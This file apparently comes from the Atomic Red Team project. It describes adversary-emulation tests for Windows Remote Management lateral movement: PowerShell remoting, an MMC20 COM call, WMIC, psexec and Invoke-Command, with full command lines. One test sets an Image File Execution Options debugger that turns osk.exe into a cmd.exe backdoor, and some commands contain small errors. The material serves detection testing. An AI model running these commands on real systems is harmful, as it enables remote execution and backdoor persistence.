security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1028/T1028.md
T
CircleCI Atomic Red Team doc generator 499c751bcc Generate docs from job=validate_atomics_generate_docs branch=master
2019-09-03 13:36:10 +00:00

127 lines
3.4 KiB
Markdown
Raw Blame History

# T1028 - Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
- [Atomic Test #2 - PowerShell Lateral Movement](#atomic-test-2---powershell-lateral-movement)
- [Atomic Test #3 - WMIC Process Call Create](#atomic-test-3---wmic-process-call-create)
- [Atomic Test #4 - Psexec](#atomic-test-4---psexec)
- [Atomic Test #5 - Invoke-Command](#atomic-test-5---invoke-command)
<br/>
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
Enable-PSRemoting -Force
```
<br/>
<br/>
## Atomic Test #2 - PowerShell Lateral Movement
Powershell lateral movement using the mmc20 application com object
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|
#### Run it with `command_prompt`!
```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
<br/>
<br/>
## Atomic Test #3 - WMIC Process Call Create
Utilize WMIC to start remote process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
```
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
<br/>
<br/>
## Atomic Test #4 - Psexec
Utilize psexec to start remote process
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
```
psexec \\host -u domain\user -p password -s cmd.exe
```
<br/>
<br/>
## Atomic Test #5 - Invoke-Command
Execute Invoke-command on remote host
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | Test|
| remote_command | Command to execute on remote Host | String | ipconfig|
#### Run it with `powershell`!
```
invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}
```
<br/>
Reference in New Issue View Git Blame Copy Permalink